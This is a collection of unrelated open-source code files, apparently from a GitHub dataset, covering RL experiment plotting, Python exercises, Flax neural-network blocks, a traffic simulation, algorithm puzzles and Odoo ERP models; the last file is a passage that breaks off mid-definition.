\"Moving Avg\"),\n]\n\nrecall_rl = [\n (\"Recall Reward Q2Q Transformer\",0.726,0.766),\n 
(\"/media/jonas/archive/master/data/rl_squad/cluster_exp/19_12_19/experiments/\" + \"RL_Transformer__12-18_21:12/\", \"Moving Avg\"),\n]\n\nbase_path = \"/media/jonas/archive/master/data/rl_squad/experiments/\"\nrecall_one_question = [\n (\"Recall Reward One Question\",0.015,0.015),\n (base_path + \"Transformer__12-19_16:50/\", \"Dropout 0.2\"),\n (base_path + \"Transformer__12-19_21:48/\", \"Dropout 0.3\"),\n (base_path + \"Transformer__12-20_02:47/\", \"Dropout 0.4\"),\n (base_path + \"Transformer__12-20_08:02/\", \"Dropout 0.5\"),\n]\n\n\n\nbase_path = \"/media/jonas/archive/master/data/rl_squad/experiments/\"\nrank_one_question = [\n (\"Rank Reward One Question\",0.047619,0.047619),\n (base_path + \"Transformer__12-20_07:26/\", \"Dropout 0.2\"),\n (base_path + \"Transformer__12-20_15:09/\", \"Dropout 0.3\"),\n (base_path + \"Transformer__12-20_20:29/\", \"Dropout 0.4\"),\n (base_path + \"Transformer__12-21_01:49/\", \"Dropout 0.5\"),\n]\n\nbase_path = \"/media/jonas/archive/master/data/rl_squad/experiments/\"\nrank_squad_one_question = [\n (\"Rank Reward One Question SQuAD Transformer\",0.047619,0.047619),\n (base_path + \"Transformer__12-21_22:30/\", \"Dropout 0.2\"),\n (base_path + \"Transformer__12-22_03:01/\", \"Dropout 0.3\"),\n (base_path + \"Transformer__12-22_07:33/\", \"Dropout 0.4\"),\n (base_path + \"Transformer__12-22_12:33/\", \"Dropout 0.5\"),\n]\n\n\nplots = [\n recall_one_question,\n rank_one_question,\n rank_squad_one_question,\n #recall_rl\n]\n\nlive = True\n\nwhile live:\n for p in plots:\n create_plot(p)\n time.sleep(60)\n\nfor p in plots:\n create_plot(p)","repo_name":"Lyngsoe/AutomaticQueryReformulation","sub_path":"analysis/rl_plot2.py","file_name":"rl_plot2.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28523684979","text":"import traceback\ndef LeiaInt(msg):\n while True:\n try:\n n = int(input(msg))\n except (ValueError, TypeError):\n print('\\033[31mERRO: por favor, digite um número inteiro válido.\\033[m')\n continue\n except (KeyboardInterrupt):\n print('\\n\\033[31mUsuario preferio não digitar esse número. 
\033[m')\n            return 0\n        else:\n            return n\ndef LeiaFloat(msg):\n    while 'valor' not in locals():\n        try:\n            valor = float(input(msg))\n        except(TypeError, ValueError):\n            print('\\033[31mERRO: Por favor, Digite um numero Real valido.\\033[m')\n            continue\n        except(KeyboardInterrupt):\n            print('\\033[31mUsuario Preferiu não Digitar o numero:\\033[m')\n            return 0\n        else:\n            return valor\n\n\ninteiro = LeiaInt('Digite um numero: ')\nreal = LeiaFloat('Digite um numero Real: ')\nprint(f'O numero inteiro foi {inteiro}\\nO numero Real foi {real}')\n","repo_name":"mathuesalexandre/cursoemvideo","sub_path":"exe.113.py","file_name":"exe.113.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28039379904","text":"\"\"\"Basic nn blocks.\"\"\"\n\nfrom rflax.types import Array, DType, Initializer, ActivationFn\nfrom rflax.components.initializers import kernel_default, bias_default\n\nfrom typing import Optional, Union, Sequence\n\nimport chex\nimport jax.numpy as jnp\nimport flax.linen as nn\n\n\ndef _convert_to_activation_fn(\n    fn_or_string: Union[str, ActivationFn]) -> ActivationFn:\n  if fn_or_string == \"linear\":\n    return lambda x: x\n  elif isinstance(fn_or_string, str):\n    return getattr(nn, fn_or_string)\n  elif callable(fn_or_string):\n    return fn_or_string\n  else:\n    raise ValueError(\"Don't know how to convert %s to an activation function.\" %\n                     (fn_or_string,))\n\n@chex.dataclass(frozen=True)\nclass MlpConfig:\n  dtype: DType = jnp.float32\n  activations: str = \"relu\"\n  intermediate_dim: int = 2048\n  kernel_init: Initializer = kernel_default()\n  bias_init: Initializer = bias_default()\n  intermediate_dropout: float = 0.1\n  final_dropout: Optional[float] = None\n\n\nclass MlpBlock(nn.Module):\n  out_dim: int\n  use_bias: bool\n  config: MlpConfig\n\n  @nn.compact\n  def __call__(self,\n               inp: Array,\n               enable_dropout: bool = True) -> chex.ArrayDevice:\n    config = self.config\n\n    def dense(n_feats: int, name: str, inputs: Array,\n              dropout: float) -> chex.ArrayDevice:\n      x = nn.Dense(\n          features=n_feats,\n          use_bias=self.use_bias,\n          dtype=config.dtype,\n          kernel_init=config.kernel_init,\n          bias_init=config.bias_init,\n          name=name,\n      )(inputs)\n      return nn.Dropout(rate=dropout)(x, deterministic=not enable_dropout)\n\n    for i, act_fn in enumerate(config.activations.split(\"-\")):\n      # count the hidden layers from the split list, not the raw string length\n      dense_name = \"hidden\" if len(config.activations.split(\"-\")) == 1 else f\"hidden_{i}\"\n      inp = dense(config.intermediate_dim, dense_name, inp,\n                  config.intermediate_dropout)\n      inp = _convert_to_activation_fn(act_fn)(inp)\n\n    return dense(\n        self.out_dim,\n        \"out\",\n        inp,\n        config.final_dropout if config.final_dropout else config.intermediate_dropout,\n    )\n\n\nclass MultiOutputMlp(nn.Module):\n  out_dim: Sequence[int]\n  use_bias: bool\n  config: MlpConfig\n\n  @nn.compact\n  def __call__(self,\n               inp: Array,\n               enable_dropout: bool = True) -> Sequence[Array]:\n    config = self.config\n\n    def dense(n_feats: int, name: str, inputs: Array,\n              dropout: float) -> chex.ArrayDevice:\n      x = nn.Dense(\n          features=n_feats,\n          use_bias=self.use_bias,\n          dtype=config.dtype,\n          kernel_init=config.kernel_init,\n          bias_init=config.bias_init,\n          name=name,\n      )(inputs)\n      return nn.Dropout(rate=dropout)(x, deterministic=not enable_dropout)\n\n    for i, act_fn in enumerate(config.activations.split(\"-\")):\n      dense_name = \"hidden\" if len(config.activations.split(\"-\")) == 1 else f\"hidden_{i}\"\n      inp = dense(config.intermediate_dim, dense_name, inp,\n                  config.intermediate_dropout)\n      inp = 
_convert_to_activation_fn(act_fn)(inp)\n\n    outputs = []\n    do_rate = (config.final_dropout\n               if config.final_dropout else config.intermediate_dropout)\n    for i, od in enumerate(self.out_dim):\n      outputs.append(\n          dense(od, \"out\" if len(self.out_dim) == 1 else f\"out_{i}\", inp,\n                do_rate))\n\n    return tuple(outputs)\n","repo_name":"gzqaq/rflax","sub_path":"rflax/components/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40123992560","text":"class Solution:\r\n    def fizzBuzz(self, n):\r\n        a = []\r\n        for i in range(1, n + 1):\r\n            if i % 3 == 0 and i % 5 == 0:\r\n                a.append(\"FizzBuzz\")\r\n            elif i % 3 == 0:\r\n                a.append(\"Fizz\")\r\n            elif i % 5 == 0:\r\n                a.append(\"Buzz\")\r\n            else:\r\n                a.append(str(i))\r\n        return a\r\n\r\n\r\nif __name__ == '__main__':\r\n    sol = Solution()\r\n    assert sol.fizzBuzz(1) == [\"1\"]\r\n","repo_name":"pangyouzhen/data-structure","sub_path":"math_/412 fizzBuzz.py","file_name":"412 fizzBuzz.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8296168013","text":"from simulation.classes.Lane import Lane\nfrom simulation.classes.World import World\nfrom simulation.classes.Car import Car\nfrom simulation.classes.Signal import Signal\nfrom simulation.classes.InductionCoil import InductionCoil\nfrom simulation.classes.Location import Location\nfrom simulation.classes.SignalManager import SignalManager\n\nfrom preprocess.processing_module import get_coordinates, calculate_trajectory, get_lane, vehicles_laneID\nfrom preprocess.lane_technical_information import get_dict_lane_info\nfrom preprocess.sensor_technical_information import get_dict_sensor_info\nfrom simulation.length_per_laneID import get_length_all_lanes\nfrom common import open_xml, get_available_intersections, clear_cars_movements\nfrom const import cars_data_location, intersection_data_location, car_length\nimport os\nimport csv\nimport glob\nimport names\nfrom alive_progress import alive_bar\n\n\ndef run_simulation(begin_time: int, end_time: int) -> None:\n    clear_cars_movements()\n\n    lanes, signals, inductioncoils = load_lanes_signals_and_inductioncoils()\n    worlds_array = []\n    worlds_dict = {}\n    car_merges = {}\n    to_update = []\n\n    def add_world(addworld: World, index=None) -> World:\n        \"\"\"\n        Adds the world to the worlds_array and worlds_dict;\n        if there is already a world at that runtime, it merges them.\n        \"\"\"\n        if addworld.runtime in worlds_dict:\n            existing_world: World = worlds_dict[addworld.runtime]\n            existing_world.merge_world_into(addworld, car_merges)\n            return existing_world\n        else:\n            worlds_array.insert(index if index is not None else len(worlds_array), addworld)\n            worlds_dict[addworld.runtime] = addworld\n            return addworld\n\n    # Initialize worlds with car spawn points\n    with open(os.path.join('preprocess', 'output', 'spawn_points.csv')) as csvfile:\n        reader = csv.reader(csvfile, delimiter=';')\n        next(reader, None)\n        for i, row in enumerate(reader):\n            time = int(row[0])\n            if time >= begin_time:\n                if time <= end_time:\n                    car = Car(str(i), Location(lanes[row[1]], float(row[2])), car_length, 8.3)\n                    car_merges[car.id] = car.id\n                    world = World([car], lanes, signals, inductioncoils, time)\n                    add_world(world)\n                else:\n                    break\n    print('Loaded spawn points, now simulating')\n\n    # Main simulation loop\n    to_update.append(worlds_array[0])\n    while to_update:\n        update_world = 
to_update.pop(0)\n        print(f\"{begin_time} - {update_world.runtime} - {end_time}\", end='\\r')\n        next_world = update_world.next_world(100)\n        next_world = add_world(next_world, worlds_array.index(update_world) + 1)\n        if begin_time < next_world.runtime < end_time:\n            to_update.append(next_world)\n    print('Simulation done, now exporting')\n\n    # Export to csv's\n\n    # Don't know why this happens but this should fix it\n    for fix_key, fix_value in [(k, car_merges[v]) for k, v in car_merges.items() if car_merges[v] != v]:\n        car_merges[fix_key] = fix_value\n    unique_cars = tuple(set(car_merges.values()))\n    export_paths = {i: os.path.join(cars_data_location, f'sim_car_{i}.csv') for i in unique_cars}\n    for filepath in export_paths.values():\n        with open(filepath, 'w') as file:\n            writer = csv.writer(file, delimiter=';', lineterminator='\\n')\n            writer.writerow(('time', 'latitude', 'longitude'))\n    for world in worlds_array:\n        print(f\"{world.runtime} / {worlds_array[-1].runtime}\", end='\\r')\n        for car in world.cars.values():\n            with open(export_paths[car_merges[car.id]], 'a') as file:\n                file.write(';'.join(map(str, (world.runtime, *car.location.to_geo())))+'\\n')\n    print('Exported, done!')\n\n\ndef get_lane_objects(vehicles_lanes, lane_indcoil_signal, root, filename) -> dict:\n    \"\"\"\n    Return a dict containing the defined Lane objects of all the vehicle lanes in the specified filename.\n\n    For our simulation, we will be focusing on the lanes that are intended for vehicles.\n    \"\"\"\n    lane_objects = {} # dict containing the Lane Objects\n\n    for id in vehicles_lanes.keys(): # iterate through each lane\n\n        # Defining Signal object of lane\n        if id.zfill(2) in lane_indcoil_signal.keys() and lane_indcoil_signal[id.zfill(2)][\n                'traffic_light'] != '': # check if laneID of lane in dict and if lane contains any traffic lights\n            signal_id = lane_indcoil_signal[id.zfill(2)]['traffic_light'] # get the signal_id\n\n            signal = Signal(signal_id) # define Signal object\n        else:\n            signal = None\n\n        coordinaten = get_coordinates(root, vehicles_lanes[id], 'ingress') # [::-1] # get the coordinates of lane\n\n        # Define Lane object based on the type of the lane.\n        # An ingress lane contains the necessary coordinates of a trajectory.\n        # We can directly define a trajectory Lane object and an ingress Lane object. 
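\n        # (Illustrative summary) each vehicle movement thus becomes a chain of three\n        # lanes -- ingress -> trajectory -> egress -- which is linked together after this loop.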
\n        if vehicles_lanes[id][3][0].text == '10': # ingress\n            linked_egresslane = vehicles_lanes[id][5][0][0][0].text\n            laneid = filename + \"_\" + id\n            # laneid = id\n            lane_objects[laneid] = Lane(laneid, coordinaten[::-1], 'ingress', signal) # add to dict\n\n            # Define the instance variable for a Lane object of a trajectory\n            lane_ing = get_lane(root, id)\n            traj_id = filename + \"_\" + id + '-' + linked_egresslane # define the id\n            # traj_id = id + '-' + linked_egresslane # define the id\n            traj_coordinates = get_coordinates(root, lane_ing, 'trajectory') # get coordinates of trajectory\n\n            lane_objects[traj_id] = Lane(traj_id, traj_coordinates,\n                                         'trajectory') # define Lane object and add it to lane_objects\n\n        else: # egress\n            laneid = filename + \"_\" + id\n            # laneid = id\n            lane_objects[laneid] = Lane(laneid, coordinaten, 'egress', signal)\n\n    \n    for lane in lane_objects:\n        if \"-\" in lane:\n            temp = lane.split('-') # bos210_1-26 -> bos210_1, 26->bos210_26\n\n            ingress_lane = lane_objects.get(temp[0])\n            traject_lane = lane_objects.get(lane)\n            egress_lane = lane_objects.get(filename + '_' + temp[1])\n\n            ingress_lane.connectedlane(traject_lane)\n            traject_lane.connectedlane(egress_lane)\n    return lane_objects\n\n\ndef get_signal_objects(dict_signals) -> dict:\n    # print(dict_signals)\n    'Get a dict of all the Signals'\n    signals = {}\n    for _, j in dict_signals.items():\n        if j['traffic_light'] != '':\n            signals[j['traffic_light']] = Signal(j['traffic_light'])\n    return signals\n\n\ndef get_inductioncoils(sensors_all_lanes, lane_objects) -> dict:\n    'Define a dict of InductionCoil objects'\n\n    inductioncoils = {} # dict of all the induction coils of all the lanes\n\n    for lane in lane_objects.values(): # iterate through each lane\n        if lane.getTypeLane() != 'trajectory':\n            id = lane.getID().split('_')[1] # bos210_1 -> get 1\n            if bool(sensors_all_lanes[id]['sensors']): # check if lane contains induction coils\n\n                # iterate through inductionloops\n                for sensorID in sensors_all_lanes[id]['sensors'].keys():\n                    centerposition = sensors_all_lanes[id]['sensors'][sensorID][\n                        'position'] # get the center location / sensor position\n                    sensor_length = sensors_all_lanes[id]['sensors'][sensorID]['length'] # get the length\n\n                    # Define InductionCoil\n                    centerposition = tuple(map(lambda x: int(x) / 10000000, centerposition))\n                    distance = lane.coordinate_to_meters(centerposition)\n                    centerlocation = Location(lane, distance)\n                    induction_coil = InductionCoil(sensorID, centerlocation, float(sensor_length) / 100)\n\n                    # Add to dict of inductioncoils\n                    inductioncoils[sensorID] = induction_coil\n    \n\n    return inductioncoils\n\n\ndef load_lanes_signals_and_inductioncoils() -> (dict, dict, dict):\n    layout_paths = get_available_intersections() # example: ['BOS210', 'BOS211']\n\n    lanes = {}\n    signals = {}\n    inductioncoils = {}\n    for filename in layout_paths:\n\n        root = open_xml(filename)\n        # Define the necessary dictionaries that will be used to define our class objects\n        vehicles_lanes = vehicles_laneID(\n            root) # Get the laneID and generic lane of every lane that is specific to vehicles\n        lane_indcoil_signal = get_dict_lane_info(\n            filename) # dictionary of the induction loops and trafficlights of all lanes\n        lanes_length = get_length_all_lanes(filename) # dictionary of the length of all lanes\n        sensors_all_lanes = get_dict_sensor_info(filename)\n        # build the lane, signal and induction coil objects for this intersection\n\n        # Define the Lane objects\n        file_lanes = get_lane_objects(vehicles_lanes, lane_indcoil_signal, root, filename)\n\n        # Define the Signal objects\n        file_signals = 
get_signal_objects(lane_indcoil_signal)\n for signal in new_signals:\n new_signals[signal].setIntersection(filename)\n # Define the InductionCoil objects\n new_inductioncoils = get_inductioncoils(sensors_all_lanes, new_lanes)\n for inductioncoil in new_inductioncoils:\n new_inductioncoils[inductioncoil].setIntersection(filename)\n\n # accumulate the per-file dicts (previously each dict updated itself, so only the last file survived)\n lanes.update(new_lanes)\n signals.update(new_signals)\n inductioncoils.update(new_inductioncoils)\n\n pathlst = []\n for intersection in get_available_intersections():\n path = os.path.join(intersection_data_location, intersection, \"compressed\", \"compressed.csv\")\n pathlst.append(path)\n # print(pathlst)\n signalMg = SignalManager(pathlst)\n for signal in signals:\n signals.get(signal).setSignalManager(signalMg) # Can't check if this works yet\n #print(signals.get(signal).getState(1610492290820))\n #print(\"the signal id's are: \",signals.get(signal).id)\n\n for inductioncoil in inductioncoils:\n inductioncoils.get(inductioncoil).setSignalManager(signalMg) # Can't check if this works yet\n\n # debug aid: for lane in lanes: print(lanes.get(lane).id)\n\n return (lanes, signals, inductioncoils)\n\n","repo_name":"Lucas-vdr-Horst/VIS-group-C","sub_path":"simulation/run_simulation.py","file_name":"run_simulation.py","file_ext":"py","file_size_in_byte":10442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71312810027","text":"import unicornhat as uh\nimport time\nimport random\nuh.set_layout(uh.AUTO)\nuh.rotation(0)\nuh.brightness(0.5)\nwidth,height=uh.get_shape()\n#colors = [1, 128, 244] # fixed start colors\ncolors = [random.randint(3, 240), random.randint(3, 240), random.randint(3, 240), ] # selects random start color in \"safe zone\"\n#steps = [1, 3, 4] # set wavelength\nsteps = [random.randint(1, 2), random.randint(1, 2), random.randint(1, 2)] # selects a random step between 1 and 2\nprint(\"INIT\") ## REPL\ndef getColor(index, colors, steps):\n if colors[index] >= 255 or colors[index] <= 0: # flip the sign of the step at the max/min\n steps[index] *= -1\n colors[index] += steps[index] # increment the value\n if colors[index] > 255: colors[index] = 255 # accounting for stepping over 255\n if colors[index] < 0: colors[index] = 0 # accounting for stepping under 0\n return (colors[index], colors, steps) # returns colors for index\n\nwhile True:\n r, colors, steps = getColor(0, colors, steps) # gets red\n g, colors, steps = getColor(1, colors, steps) # gets green\n b, colors, steps = getColor(2, colors, steps) # gets blue\n print(\"STEP = \", steps, \"COLOR = \", colors) # REPL debug print\n uh.clear()\n uh.set_all(r, g, b) # set every pixel to the current colour\n uh.show()\n time.sleep(random.random()) # random wait time between 0 and 1\n","repo_name":"ab-gh/trinket","sub_path":"random_color_phat.py","file_name":"random_color_phat.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9955290167","text":"n, m = [int(value) for value in input().split(\" \")]\ncheckItems = [value for value in input().split(\" \")]\n\ntotalN = 0\ntotalM = 0\nfor i in range(n):\n items = [value for value in input().split(\" \")]\n flag = True\n output = \"\"\n itemLength = len(items)\n for j in range(1, itemLength):\n for k in range(m):\n if items[j] == checkItems[k]:\n if flag:\n output = output + items[0] + \": \"\n flag = False\n\n output = output + items[j] + \" \"\n totalM += 1\n\n if len(output) > 0:\n totalN += 1\n 
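        # e.g. with banned ids {'2333', '6666'}, the record '233 2 2333 6666' would print\n        # '233: 2333 6666' below and add 1 person / 2 banned items to the totals (illustrative values)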
print(output.rstrip())\n\nprint(str(totalN) + \" \" + str(totalM))\n","repo_name":"wangcaitao/pat","sub_path":"pat-python/basic-level/1072.py","file_name":"1072.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26327606479","text":"import re\r\nfrom collections import defaultdict\r\nimport collections\r\n\r\n# Point = collections.namedtuple('Point',['x','y'])\r\n#\r\n# directions = {\r\n# (+1, +0): 'e',\r\n# (+1, -1): 'ne',\r\n# (+0, -1): 'n',\r\n# (-1, -1): 'nw',\r\n# (-1, +0): 'w',\r\n# (-1, +1): 'sw',\r\n# (+0, +1): 's',\r\n# (+1, +1): 'se',\r\n# }\r\n#\r\n# def direction(x1, y1, x2, y2):\r\n# direc = {\r\n# (+1, +0): 'e',\r\n# (+1, -1): 'ne',\r\n# (+0, -1): 'n',\r\n# (-1, -1): 'nw',\r\n# (-1, +0): 'w',\r\n# (-1, +1): 'sw',\r\n# (+0, +1): 's',\r\n# (+1, +1): 'se',\r\n# }\r\n#\r\n# dx = x2 - x1\r\n# dy = y2 - y1\r\n# dx = dx/abs(dx) if dx != 0 else 0\r\n# dy = dy/abs(dx) if dy != 0 else 0\r\n# return directions[(dx, dy)]\r\n#\r\n# class Line:\r\n# def __init__(self, x1, y1, x2, y2):\r\n# self.p1 = Point(x1, y1)\r\n# self.p2 = Point(x2, y2)\r\n# dx = x2 - x1\r\n# dy = y2 - y1\r\n# self.dx = dx / abs(dx) if dx != 0 else 0\r\n# self.dy = dy / abs(dx) if dy != 0 else 0\r\n# self.length = max(abs(dx), abs(dy))\r\n#\r\n# def intersects(self, x, y):\r\n# if self.direction == 'horizontal':\r\n# return y == self.p1.y and self.p1.x <= x <= self.p2.x\r\n\r\nif __name__ == \"__main__\":\r\n pattern = re.compile(r\"(\\d+),(\\d+) -> (\\d+),(\\d+)\")\r\n\r\n with open('input.txt', 'r') as input_file:\r\n lines = [line.strip() for line in input_file.readlines() if len(line) > 1]\r\n\r\n lines = [[int(i) for i in pattern.match(line).groups()] for line in lines]\r\n lines = [l for l in lines if\r\n l[0] == l[2] or\r\n l[1] == l[3] or\r\n abs(l[2]-l[0]) == abs(l[3]-l[1])\r\n ]\r\n\r\n containing_lines = defaultdict(lambda: [])\r\n\r\n for l_i, line in enumerate(lines):\r\n dx = line[2] - line[0]\r\n dy = line[3] - line[1]\r\n length = max(abs(dx), abs(dy))\r\n dx = dx / abs(dx) if dx else 0\r\n dy = dy / abs(dy) if dy else 0\r\n dx, dy = int(dx), int(dy)\r\n for p_i in range(int(length) + 1):\r\n containing_lines[(\r\n line[0] + p_i * dx,\r\n line[1] + p_i * dy\r\n )].append(l_i)\r\n\r\n overlaps = [key for key, value in containing_lines.items() if len(value) > 1]\r\n print(len(overlaps))\r\n\r\n # for x in range(1000):\r\n # for y in range(1000):\r\n # c = len(containing_lines[(y,x)])\r\n # print(c if c else \" \", end=\" \")\r\n # print(\"\")\r\n\r\n\r\n\r\n","repo_name":"LLinville/misc_code","sub_path":"advent2021/5/day5b-2.py","file_name":"day5b-2.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29500284097","text":"f = open('Week2IntegerArray.txt')\nl = []\nfor line in f:\n x = line.strip()\n l.append(int(x))\n\n\n\ndef inversions(items):\n n = len(items)\n if n <= 1:\n return items, 0\n\n # number of inversions in partitions\n left, linv = inversions(items[:n // 2])\n right, rinv = inversions(items[n // 2:])\n\n inv = linv + rinv\n llen, rlen = len(left), len(right)\n i, j, aux = 0, 0, []\n\n # merge and count inversions\n for k in range(n):\n if i < llen and j < rlen and left[i] > right[j]:\n inv += llen - i\n aux.append(right[j])\n j += 1\n elif i < llen:\n aux.append(left[i])\n i += 1\n else:\n aux.append(right[j])\n j += 1\n\n return aux, inv\n\nprint(len(l))\naux, inv = 
inversions(l)\nprint(inv)\n\n'''\n%timeit inversions(l)\n440 ms ± 2.86 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)\n'''","repo_name":"KillTheHeart00000/Coursera_Algorithms-Specialization_Stanford","sub_path":"Course1/Week2_Counting Inversions/Week2_1_CountingInversions.py","file_name":"Week2_1_CountingInversions.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21222594416","text":"from odoo import api, fields, models\n\nclass DistributionService(models.Model):\n _name = 'distribution.service'\n _description = 'Distribution Service'\n\n distribution_on = fields.Selection([('quantity', 'Quantity'), ('weight', 'Weight'), ('length', 'Length')], string='Distribution On')\n product_id = fields.Many2one('product.product', string='Service Charge')\n quantity = fields.Float(string='Quantity', digits='New Cortex Precision')\n price_unit = fields.Float(string='Unit Price', digits='Product Price')\n product_uom_id = fields.Many2one('uom.uom', string='Unit of Measure', default=lambda self: self.env.ref('uom.product_uom_unit'))\n subtotal = fields.Float(string='Subtotal', compute='_compute_subtotal', digits='New Cortex Product Precision')\n batch_production_id = fields.Many2one('batch.production', string='Batch Production', ondelete='cascade')\n\n @api.depends('quantity', 'price_unit')\n def _compute_subtotal(self):\n for record in self:\n record.subtotal = record.quantity * record.price_unit\n \n @api.onchange('product_id')\n def onchange_product(self):\n if self.product_id:\n self.product_uom_id = self.product_id.uom_id.id\n self.price_unit = self.product_id.standard_price\n","repo_name":"Cortex4103/Cortex2","sub_path":"cortex_na/models/distribution_service.py","file_name":"distribution_service.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5334857402","text":"from configs import get_common_args\nfrom learners import laprepr, spectral_cluster, option_map_constructor, offline_planner\nfrom utils import timer_tools\nfrom envs.simple_rl.tasks import PinballMDP\nfrom utils import episodic_replay_buffer\nimport os\nimport torch\nimport time\n\ndef main():\n timer = timer_tools.Timer()\n args = get_common_args()\n temp_time = time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime(time.time()))\n args.model_dir = args.model_dir + '/' + temp_time\n args.log_dir = args.log_dir + '/' + temp_time\n\n if torch.cuda.is_available() and args.cuda:\n args.device = torch.device('cuda')\n if args.gpu is not None:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n else:\n args.device = torch.device('cpu')\n print('device: {}.'.format(args.device))\n\n if args.env_id == 'Pinball':\n cases = {'medium':{'cfg': \"pinball_medium.cfg\", 'start': [(0.2, 0.9), (0.2, 0.5), (0.9, 0.9), (0.9, 0.5), (0.3, 0.3), (0.9, 0.1), (0.5, 0.1),\n (0.05, 0.05), (0.2, 0.05), (0.35, 0.65), (0.5, 0.3), (0.5, 0.45), (0.45, 0.6)],\n 'task_list': [[(0.2, 0.5), (0.9, 0.1)], [(0.9, 0.5), (0.45, 0.6)], [(0.9, 0.5), (0.35, 0.65)], [(0.2, 0.9), (0.5, 0.1)]]}}\n env = PinballMDP(render=args.render, episode_length=1000, reward_scale=1000., cfg=cases['medium']['cfg'], start_points=cases['medium']['start'],\n task_list=cases['medium']['task_list'])\n else:\n raise NotImplementedError\n\n env_info = env.get_env_info()\n args.obs_dim = env_info['obs_dim']\n args.obs_pos_dim = env_info['obs_pos_dim']\n args.act_dim = env_info['act_dim']\n\n # 
learn the eigenfunctions\n replay_buffer = episodic_replay_buffer.EpisodicReplayBuffer(max_size=args.lap_replay_buffer_size) # shared\n learner = laprepr.LapReprLearner(args, env, replay_buffer)\n learner.train()\n # spectral clustering with the learned estimations\n sc_agent = spectral_cluster.SpectralCluster(args, learner, replay_buffer)\n centers, sub_goals = sc_agent.clustering() # centers: list of States, sub_goals: dict\n # option construction with the newly found landmarks\n oc_agent = option_map_constructor.OptionConstructor(env, args, centers, sub_goals, learner)\n oc_agent.build_topo_map()\n # offline planning based on the topological map\n op_agent = offline_planner.OfflinePlanner(args, env, oc_agent, sc_agent, learner)\n op_agent.planning(task_list=env.get_task_list())\n print('Total time cost: {:.4g}s.'.format(timer.time_cost()))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"LucasCJYSDL/Deep-Spectral-Option-Discovery","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9964008459","text":"import time\nimport datetime\n\nfrom openerp.osv import fields, osv\nfrom openerp import pooler\nfrom openerp import tools\nfrom openerp.tools.translate import _\nimport openerp.addons.decimal_precision as dp\n\nclass project_project(osv.osv):\n\t_inherit = 'project.project'\n\n\t_columns = {\n\t\t'is_work_order': fields.boolean('Work Order'),\n\t\t'work_order_ids': fields.one2many('project.work.order', 'project_id', \"Work Order Progress\"),\n\t}\n\n\t# def open_timesheets(self, cr, uid, ids, context=None):\n\t# \t\"\"\" open Timesheets view \"\"\"\n\t# \tmod_obj = self.pool.get('ir.model.data')\n\t# \tact_obj = self.pool.get('ir.actions.act_window')\n\n\t# \tproject = self.browse(cr, uid, ids[0], context)\n\t# \tview_context = {\n\t# \t\t'search_default_account_id': [project.analytic_account_id.id],\n\t# \t\t'default_account_id': project.analytic_account_id.id,\n\t# \t}\n\t# \thelp = _(\"\"\"

Record your timesheets for the project '%s'.

\"\"\") % (project.name,)\n\t# \ttry:\n\t# \t\tif project.to_invoice and project.partner_id:\n\t# \t\t\thelp+= _(\"\"\"

Timesheets on this project may be invoiced to %s, according to the terms defined in the contract.

\"\"\" ) % (project.partner_id.name,)\n\t# \texcept:\n\t# \t\t# if the user do not have access rights on the partner\n\t# \t\tpass\n\n\t# \tres = mod_obj.get_object_reference(cr, uid, 'hr_timesheet', 'act_hr_timesheet_line_evry1_all_form')\n\t# \tid = res and res[1] or False\n\t# \tresult = act_obj.read(cr, uid, [id], context=context)[0]\n\t# \tresult['name'] = _('Timesheets')\n\t# \tresult['context'] = view_context\n\t# \tresult['help'] = help\n\t# \treturn result\n\nproject_project()\n\nclass project_work_order(osv.osv):\n\tdef _get_amount_subtotal(self, cr, uid, ids, field_name, arg, context=None):\n\t\tcur_obj = self.pool.get('res.currency')\n\t\tres = {}\n\t\tif context is None:\n\t\t\tcontext = {}\n\t\tfor line in self.browse(cr, uid, ids, context=context):\n\t\t\tsubtotal = line.quantity * line.unit_price\n\t\t\tres[line.id] = subtotal\n\t\treturn res\n\n\tdef _progress_payment_rate(self, cr, uid, ids, names, arg, context=None):\n\t\tif context is None:\n\t\t\tcontext = {}\n\t\tres = {}\n\t\tfor wo in self.browse(cr, uid, ids, context=context):\n\t\t\tif wo.amount_subtotal:\n\t\t\t\tpaid_amount = sum([line.price_unit for line in wo.invoice_line_ids])\n\t\t\t\tprogress = round((paid_amount/wo.amount_subtotal)*100.0,2) \n\t\t\telse:\n\t\t\t\tprogress = 0.0\n\t\t\tres[wo.id] = progress\n\t\treturn res\n\n\t_name = \"project.work.order\"\t\n\t_columns={\n\t\t'project_id': fields.many2one('project.project', 'Project Ref', ondelete='cascade', required=True, select=\"1\"),\n\t\t'name': fields.char('Work summary', size=128),\n\t\t'date': fields.date('Date', select=\"1\"),\n\t\t'company_id': fields.related('project_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),\n\t\t'product_id' : fields.many2one('product.product', 'Product', domain=[('type','=','service')], 